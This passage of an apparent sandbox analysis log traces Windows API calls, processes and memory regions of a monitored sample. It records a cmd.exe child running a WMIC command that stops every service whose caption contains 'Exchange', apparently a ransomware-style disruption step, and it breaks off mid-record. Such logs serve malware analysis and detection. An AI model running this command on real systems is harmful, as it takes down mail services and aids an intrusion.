[0105.485] InitializeProcThreadAttributeList (in: lpAttributeList=0x509f2e8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x509f2cc | out: lpAttributeList=0x509f2e8, lpSize=0x509f2cc) returned 1 [0105.485] UpdateProcThreadAttribute (in: lpAttributeList=0x509f2e8, dwFlags=0x0, Attribute=0x60001, lpValue=0x509f2d4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x509f2e8, lpPreviousValue=0x0) returned 1 [0105.485] GetStartupInfoW (in: lpStartupInfo=0x509f320 | out: lpStartupInfo=0x509f320*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0105.486] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0105.487] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0105.488] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x509f270*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x509f2bc | out: lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE", lpProcessInformation=0x509f2bc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xcc4, dwThreadId=0xcc8)) returned 1 [0105.493] CloseHandle (hObject=0xa4) returned 1 [0105.493] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0105.493] GetEnvironmentStringsW () returned 0x52e9f48* [0105.493] FreeEnvironmentStringsA (penv="=") returned 1 [0105.493] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0106.486] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x509f254 | out: lpExitCode=0x509f254*=0x0) returned 1 [0106.486] CloseHandle (hObject=0xa8) returned 1 [0106.486] _vsnwprintf (in: _Buffer=0x509f33c, _BufferCount=0x13, _Format="%08X", _ArgList=0x509f25c | out: _Buffer="00000000") returned 8 [0106.486] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0106.486] GetEnvironmentStringsW () returned 0x52e7de0* [0106.486] FreeEnvironmentStringsA (penv="=") returned 1 [0106.486] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0106.486] GetEnvironmentStringsW () returned 0x52e7de0* [0106.486] FreeEnvironmentStringsA (penv="=") returned 1 [0106.486] DeleteProcThreadAttributeList (in: lpAttributeList=0x509f2e8 | out: lpAttributeList=0x509f2e8) [0106.486] _get_osfhandle (_FileHandle=1) returned 0x3c [0106.486] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0106.488] _get_osfhandle (_FileHandle=1) returned 0x3c [0106.488] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0106.488] _get_osfhandle (_FileHandle=0) returned 0x38 [0106.488] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0106.488] SetConsoleInputExeNameW () returned 0x1 [0106.488] GetConsoleOutputCP () returned 0x1b5 [0106.488] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0106.488] SetThreadUILanguage (LangId=0x0) returned 0x409 [0106.488] exit (_Code=0) Thread: id = 156 os_tid = 0xcc0 Process: id = "29" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x44f4a000" os_pid = "0xcb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "28" os_parent_pid = "0xca8" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1908 start_va = 0x7f3f0000 end_va = 0x7f3f0fff entry_point = 0x0 region_type = private name = "private_0x000000007f3f0000" filename = "" Region: id = 1909 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1910 start_va = 0xa9eb080000 end_va = 0xa9eb09ffff entry_point = 0x0 region_type = private name = "private_0x000000a9eb080000" filename = "" Region: id = 1911 start_va = 0xa9eb0a0000 end_va = 0xa9eb0b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a9eb0a0000" filename = "" Region: id = 1912 start_va = 0xa9eb0c0000 end_va = 0xa9eb0fffff entry_point = 0x0 region_type = private name = "private_0x000000a9eb0c0000" filename = "" Region: id = 1913 start_va = 0x7df5ffa40000 end_va = 0x7ff5ffa3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffa40000" filename = "" Region: id = 1914 start_va = 0x7ff6c41e0000 end_va = 0x7ff6c4202fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c41e0000" filename = "" Region: id = 1915 start_va = 0x7ff6c420d000 end_va = 0x7ff6c420efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c420d000" filename = "" Region: id = 1916 start_va = 0x7ff6c420f000 end_va = 0x7ff6c420ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c420f000" filename = "" Region: id = 1917 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1918 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1919 start_va = 0xa9eb140000 end_va = 0xa9eb23ffff entry_point = 0x0 region_type = private name = "private_0x000000a9eb140000" filename = "" Region: id = 1920 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1921 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1922 start_va = 0xa9eb080000 end_va = 0xa9eb08ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a9eb080000" filename = "" Region: id = 1923 start_va = 0xa9eb090000 end_va = 0xa9eb096fff entry_point = 0x0 region_type = private name = "private_0x000000a9eb090000" filename = "" Region: id = 1924 start_va = 0xa9eb100000 end_va = 0xa9eb13ffff entry_point = 0x0 region_type = private name = "private_0x000000a9eb100000" filename = "" Region: id = 1925 start_va = 0xa9eb240000 end_va = 0xa9eb2fdfff entry_point = 0xa9eb240000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1926 start_va = 0xa9eb300000 end_va = 0xa9eb300fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a9eb300000" filename = "" Region: id = 1927 start_va = 0xa9eb310000 end_va = 0xa9eb316fff entry_point = 0x0 region_type = private name = "private_0x000000a9eb310000" filename = "" Region: id = 1928 start_va = 0xa9eb320000 end_va = 0xa9eb320fff entry_point = 0x0 region_type = private name = "private_0x000000a9eb320000" filename = "" Region: id = 1929 start_va = 0xa9eb330000 end_va = 0xa9eb330fff entry_point = 0x0 region_type = private name = "private_0x000000a9eb330000" filename = "" Region: id = 1930 start_va = 0xa9eb3a0000 end_va = 0xa9eb3affff entry_point = 0x0 region_type = private name = "private_0x000000a9eb3a0000" filename = "" Region: id = 1931 start_va = 0xa9eb3b0000 end_va = 0xa9eb537fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a9eb3b0000" filename = "" Region: id = 1932 start_va = 0xa9eb540000 end_va = 0xa9eb6c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a9eb540000" filename = "" Region: id = 1933 start_va = 0xa9eb6d0000 end_va = 0xa9ecacffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a9eb6d0000" filename = "" Region: id = 1934 start_va = 0x7ff6c40e0000 end_va = 0x7ff6c41dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c40e0000" filename = "" Region: id = 1935 start_va = 0x7ff6c420b000 end_va = 0x7ff6c420cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c420b000" filename = "" Region: id = 1936 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1937 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1938 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1939 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1940 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1941 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1942 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1943 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1944 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1945 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1946 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1947 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 153 os_tid = 0xcb4 Thread: id = 154 os_tid = 0xcb8 Thread: id = 155 os_tid = 0xcbc Process: id = "30" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x46449000" os_pid = "0xcc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "28" os_parent_pid = "0xca8" cmd_line = "WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1961 start_va = 0x450000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 1962 start_va = 0x470000 end_va = 0x471fff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 1963 start_va = 0x480000 end_va = 0x493fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1964 start_va = 0x4a0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1965 start_va = 0x4e0000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 1966 start_va = 0x520000 end_va = 0x523fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 1967 start_va = 0x530000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1968 start_va = 0x540000 end_va = 0x541fff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1969 start_va = 0x1300000 end_va = 0x1363fff entry_point = 0x1300000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 1970 start_va = 0x1370000 end_va = 0x536ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 1971 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1972 start_va = 0x7f670000 end_va = 0x7f692fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f670000" filename = "" Region: id = 1973 start_va = 0x7f694000 end_va = 0x7f694fff entry_point = 0x0 region_type = private name = "private_0x000000007f694000" filename = "" Region: id = 1974 start_va = 0x7f697000 end_va = 0x7f697fff entry_point = 0x0 region_type = private name = "private_0x000000007f697000" filename = "" Region: id = 1975 start_va = 0x7f69d000 end_va = 0x7f69ffff entry_point = 0x0 region_type = private name = "private_0x000000007f69d000" filename = "" Region: id = 1976 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1977 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1978 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 1979 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1980 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 1981 start_va = 0x5b0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1982 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1983 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1984 start_va = 0x5e0000 end_va = 0x6dffff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 1985 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1986 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 1987 start_va = 0x460000 end_va = 0x463fff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 1988 start_va = 0x550000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1989 start_va = 0x6e0000 end_va = 0x79dfff entry_point = 0x6e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1990 start_va = 0x7a0000 end_va = 0x7dffff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1991 start_va = 0x880000 end_va = 0x88ffff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 1992 start_va = 0x74a30000 end_va = 0x74a6efff entry_point = 0x74a30000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 1993 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1994 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1995 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1996 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1997 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1998 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1999 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2000 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2001 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2002 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2003 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 2004 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2005 start_va = 0x7f570000 end_va = 0x7f66ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f570000" filename = "" Region: id = 2006 start_va = 0x7f69a000 end_va = 0x7f69cfff entry_point = 0x0 region_type = private name = "private_0x000000007f69a000" filename = "" Region: id = 2007 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2008 start_va = 0x470000 end_va = 0x470fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 2009 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2010 start_va = 0x590000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 2011 start_va = 0x74a20000 end_va = 0x74a2cfff entry_point = 0x74a20000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 2012 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2013 start_va = 0x749b0000 end_va = 0x74a15fff entry_point = 0x749b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 2014 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2015 start_va = 0x890000 end_va = 0xbc6fff entry_point = 0x890000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2016 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2017 start_va = 0xbd0000 end_va = 0xcb8fff entry_point = 0xbd0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2018 start_va = 0x5a0000 end_va = 0x5a3fff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 2019 start_va = 0x74820000 end_va = 0x749affff entry_point = 0x74820000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 2020 start_va = 0xbd0000 end_va = 0xccffff entry_point = 